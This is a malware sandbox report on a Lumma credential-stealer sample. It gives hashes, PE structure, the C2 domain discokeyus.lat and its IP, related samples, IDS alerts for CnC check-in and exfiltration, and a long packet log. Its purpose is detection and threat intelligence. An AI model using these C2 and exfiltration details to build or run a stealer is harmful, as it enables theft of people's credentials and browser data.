Note: the Malicious column is the sandbox's per-string verdict and is false for every entry above. The discokeyus.lat variants with trailing characters (apiu, apiak, apio, apilat/J, J) appear to be string-carving artefacts of the same https://discokeyus.lat:443/api endpoint; the host itself is the only contacted domain in the IP table below and is shared with other LummaC samples in the context tables, so it should be treated as the C2 indicator regardless of the per-string flag. The browser-vendor URLs (ecosia, yahoo, mozilla, amazon, t-mobile) come from browser profile data read by the stealer, not from the sample's own network activity.
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.21.99 | discokeyus.lat | United States | 13335 | CLOUDFLARENETUS | false
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1578940
                                                                                          Start date and time:2024-12-20 16:54:14 +01:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 5m 58s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:4
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:NAliwxUTJ4.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:0a678f4e43e83079c1e95517f576a88d.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.troj.spyw.evad.winEXE@1/0@3/1
                                                                                          EGA Information:Failed
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 0
                                                                                          • Number of non-executed functions: 9
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 20.109.210.53, 13.107.246.63
                                                                                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target NAliwxUTJ4.exe, PID 828 because there are no executed functions
                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                          • Report size getting too big, too many NtQueryDirectoryFile calls found.
                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                          • VT rate limit hit for: NAliwxUTJ4.exe
Time | Type | Description
10:55:42 | API Interceptor | 10x Sleep call for process: NAliwxUTJ4.exe modified
Context: IPs (Match: 104.21.21.99)
Associated sample | Detection | Threat name
1QNOKwVoOT.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar
gJkNLYV0ax.exe | malicious | LummaC
m21jm5y5Z5.exe | malicious | LummaC
gEfWplq0xQ.exe | malicious | LummaC
gNjo8FIKN5.exe | malicious | LummaC
f48jWpQ2F8.exe | malicious | LummaC
RZnZbS97dD.exe | malicious | LummaC
SBLUj2UYnk.exe | malicious | LummaC
file.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT
file.exe | malicious | LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar

Context: Domains (Match: discokeyus.lat)
Associated sample | Detection | Threat name | Context (resolved IP)
XNtOBQ5NHr.exe | malicious | LummaC, Stealc | 172.67.197.170
Z8oTIWCyDE.exe | malicious | LummaC | 172.67.197.170
1QNOKwVoOT.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 104.21.21.99
BB4S2ErvqK.exe | malicious | LummaC | 172.67.197.170
rEK6Z2DVp8.exe | malicious | LummaC | 172.67.197.170
iv382V1eOK.exe | malicious | LummaC | 172.67.197.170
gJkNLYV0ax.exe | malicious | LummaC | 104.21.21.99
m21jm5y5Z5.exe | malicious | LummaC | 104.21.21.99
gEfWplq0xQ.exe | malicious | LummaC | 104.21.21.99
gNjo8FIKN5.exe | malicious | LummaC | 104.21.21.99

Context: ASNs (Match: CLOUDFLARENETUS)
Associated sample / URL | Detection | Threat name | Context (IP)
XNtOBQ5NHr.exe | malicious | LummaC, Stealc | 172.67.197.170
Z8oTIWCyDE.exe | malicious | LummaC | 172.67.197.170
1QNOKwVoOT.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 104.21.21.99
http://email.mg.mylearninghub.com/c/eJyUzr9OxCAcAOCngc2Gf6UwMBjPeiZ3i4nJeRuF3vWXUlBKz9anNw5OTu7f8HlDnacU94Y2XEhKJFF4MPqinXaO1KLXyhHbKKuJrLUinXVKKgyGESYoo5oyKkVT-UbwWrva876RjikkyHStpi30NkeI12HpKpcmHMxQyvuM-D1iLWKt70Oxv-ivR6y1SxkQay-Q53JIV4htCiF9HiCOiLcu-f4hxQvkCfHdG23G7vixvj4v9XY80ePTeHoJqzz79XGvzivZf51P4w0Qk-AR30muFM7GbnHJVWfzCBEJ4i2AG-ButnHc0k-jKhmX_83xzbDvAAAA__-qL3Ha | malicious | Unknown | 104.18.42.227
https://dnearymedahealthstaffing.wordpress.com/medahealthstaffing-proposal/ | malicious | HTMLPhisher | 104.21.73.56
BB4S2ErvqK.exe | malicious | LummaC | 172.67.197.170
rEK6Z2DVp8.exe | malicious | LummaC | 172.67.197.170
iv382V1eOK.exe | malicious | LummaC | 172.67.197.170
gJkNLYV0ax.exe | malicious | LummaC | 104.21.21.99
http://northwesthousingservices.discussripped.com | malicious | HTMLPhisher | 104.21.89.240

Context: JA3 fingerprints (Match: a0e9f5d64349fb13191bc781f81f42e1)
Associated sample | Detection | Threat name | Context (IP)
XNtOBQ5NHr.exe | malicious | LummaC, Stealc | 104.21.21.99
Z8oTIWCyDE.exe | malicious | LummaC | 104.21.21.99
1QNOKwVoOT.exe | malicious | LummaC, Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 104.21.21.99
BB4S2ErvqK.exe | malicious | LummaC | 104.21.21.99
rEK6Z2DVp8.exe | malicious | LummaC | 104.21.21.99
iv382V1eOK.exe | malicious | LummaC | 104.21.21.99
gJkNLYV0ax.exe | malicious | LummaC | 104.21.21.99
m21jm5y5Z5.exe | malicious | LummaC | 104.21.21.99
gEfWplq0xQ.exe | malicious | LummaC | 104.21.21.99
gNjo8FIKN5.exe | malicious | LummaC | 104.21.21.99

Context: Dropped files
No context
                                                                                                              No created / dropped files found
                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Entropy (8bit):7.948090750964882
                                                                                                              TrID:
                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                              File name:NAliwxUTJ4.exe
                                                                                                              File size:1'861'120 bytes
                                                                                                              MD5:0a678f4e43e83079c1e95517f576a88d
                                                                                                              SHA1:4012a39b2f700273402d3adbc54f0f87eac2fa56
                                                                                                              SHA256:6b17962e6298e3118f5301af6bdceccbf3c79663e4a526e128a5c306a232bc01
                                                                                                              SHA512:c3ee30975f86b80db6f8b0ed9a032924a12486528e0745d02e1e4372de1775ecda86cdd17c28586dcdde1300a95c66579b707944dcdf445b21ccba2f4fc6df63
                                                                                                              SSDEEP:24576:1D3Z+og2dL7dT1TKvDXBujJ535WxkeQaJ4LAQJtbbY9mjrdprIt6vxM2c3WDLKoR:ZJTH/9hWxkeP2Mm7ra6pM2c3+XLl
                                                                                                              TLSH:CB85330E3F17B4E3CE66C537187514832EB004E8C8CAB5AC7A65FFE8946721A5D49C6B
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g..............................I...........@...........................I...........@.................................T0..h..
Icon Hash: 00928e8e8686b000
Entrypoint: 0x898000
Entrypoint Section: .taggant
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp: 0x675F3CD1 [Sun Dec 15 20:32:17 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 2eabe9054cad5152567f0699947a2c5b
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x53054 | 0x68 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x52000 | 0x1ac | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x531f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
 | 0x1000 | 0x51000 | 0x24800 | 7e94ac9668edf73f2afd5ee88be294b9 | False | 0.9973980629280822 | data | 7.9808008709140585 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x52000 | 0x1ac | 0x200 | 75720b8ea60aa06a31806981b744f74e | False | 0.5390625 | data | 5.245569576626531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x53000 | 0x1000 | 0x200 | 19a29171433eeef17e42fd663f137134 | False | 0.14453125 | data | 0.9996515881509258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
 | 0x54000 | 0x2a4000 | 0x200 | 6d43d4ce893b2d6ca7548bac0c853865 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
speiiqif | 0x2f8000 | 0x19f000 | 0x19e200 | 3c9d0ef281852de18235a1d8017352a6 | False | 0.9946216844627226 | data | 7.953421574141461 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
suzusvsz | 0x497000 | 0x1000 | 0x400 | 675a6c3c52b6932bc89b74b99a9964b3 | False | 0.734375 | data | 5.901911512979839 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x498000 | 0x3000 | 0x2200 | 93ab6a4f23f8624f0b28993cda073384 | False | 0.06100643382352941 | DOS executable (COM) | 0.7879226478005152 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x52058 | 0x152 | ASCII text, with CRLF line terminators |  |  | 0.6479289940828402
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-20T16:55:43.732478+0100 | 2058378 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sweepyribs .lat) | 1 | 192.168.2.6 | 58462 | 1.1.1.1 | 53 | UDP
2024-12-20T16:55:43.929541+0100 | 2058364 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grannyejh .lat) | 1 | 192.168.2.6 | 64495 | 1.1.1.1 | 53 | UDP
2024-12-20T16:55:44.125790+0100 | 2058360 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (discokeyus .lat) | 1 | 192.168.2.6 | 63435 | 1.1.1.1 | 53 | UDP
2024-12-20T16:55:45.988644+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.6 | 49716 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:45.988644+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49716 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:47.721915+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.6 | 49716 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:47.721915+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49716 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:49.316014+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.6 | 49718 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:49.316014+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49718 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:50.075795+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.6 | 49718 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:50.075795+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.6 | 49718 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:51.829517+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.6 | 49719 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:51.829517+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49719 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:54.160731+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.6 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:54.160731+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49721 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:57.164911+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.6 | 49723 | 104.21.21.99 | 443 | TCP
2024-12-20T16:55:57.164911+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49723 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:00.318496+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.6 | 49726 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:00.318496+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49726 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:01.110822+0100 | 2048094 | ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration | 1 | 192.168.2.6 | 49726 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:02.993587+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.6 | 49729 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:02.993587+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49729 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:03.034655+0100 | 2843864 | ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 | 1 | 192.168.2.6 | 49729 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:07.187800+0100 | 2058361 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (discokeyus .lat in TLS SNI) | 1 | 192.168.2.6 | 49730 | 104.21.21.99 | 443 | TCP
2024-12-20T16:56:07.187800+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.6 | 49730 | 104.21.21.99 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 20, 2024 16:55:44.273901939 CET | 49716 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:44.273963928 CET | 443 | 49716 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:44.274107933 CET | 49716 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:44.756989002 CET | 49716 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:44.757029057 CET | 443 | 49716 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:45.988559961 CET | 443 | 49716 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:45.988643885 CET | 49716 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:45.990977049 CET | 49716 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:45.990999937 CET | 443 | 49716 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:45.991278887 CET | 443 | 49716 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:46.031238079 CET | 49716 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:46.842274904 CET | 49716 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:46.842300892 CET | 49716 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:46.842582941 CET | 443 | 49716 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:47.721921921 CET | 443 | 49716 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:47.722045898 CET | 443 | 49716 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:47.722126007 CET | 49716 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:47.944060087 CET | 49716 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:47.944097996 CET | 443 | 49716 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:47.944108009 CET | 49716 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:47.944118023 CET | 443 | 49716 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:48.098582983 CET | 49718 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:48.098618031 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:48.098690987 CET | 49718 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:48.098954916 CET | 49718 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:48.098974943 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:49.315920115 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:49.316014051 CET | 49718 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:49.317322969 CET | 49718 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:49.317349911 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:49.317614079 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:49.319152117 CET | 49718 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:49.319195986 CET | 49718 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:49.319246054 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:50.075803995 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:50.075865984 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:50.075894117 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:50.075921059 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:50.075944901 CET | 49718 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:50.075973988 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:50.075988054 CET | 49718 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:50.083815098 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:50.083889961 CET | 49718 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:50.083899021 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:50.092665911 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
Dec 20, 2024 16:55:50.092737913 CET | 49718 | 443 | 192.168.2.6 | 104.21.21.99
Dec 20, 2024 16:55:50.092744112 CET | 443 | 49718 | 104.21.21.99 | 192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.092780113 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.092838049 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.100739002 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.156351089 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.195379019 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.250041008 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.250052929 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.271349907 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.271392107 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.271513939 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.271531105 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.271563053 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.271702051 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.271714926 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.271739006 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.271744967 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.614350080 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.614372969 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.614434958 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.614752054 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.614764929 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:51.829432964 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:51.829516888 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:51.831108093 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:51.831120014 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:51.831459999 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:51.832890034 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:51.833071947 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:51.833101988 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:52.735425949 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:52.735548973 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:52.735634089 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:52.738003969 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:52.738028049 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:52.939160109 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:52.939218044 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:52.939340115 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:52.939626932 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:52.939646006 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.160629988 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.160731077 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.161969900 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.161982059 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.162226915 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.163445950 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.163597107 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.163634062 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.163692951 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.211333990 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.990446091 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.990515947 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.990669012 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.990739107 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.990767002 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:55.947637081 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:55.947685957 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:55.947773933 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:55.948128939 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:55.948153019 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:57.164815903 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:57.164911032 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:57.166687012 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:57.166704893 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:57.167123079 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:57.168477058 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:57.168672085 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:57.168728113 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:57.168804884 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:57.168816090 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:58.116678953 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:58.116786003 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:58.116945982 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:58.116998911 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:58.117022038 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:59.096456051 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:59.096501112 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:59.096736908 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:59.096967936 CET49726443192.168.2.6104.21.21.99
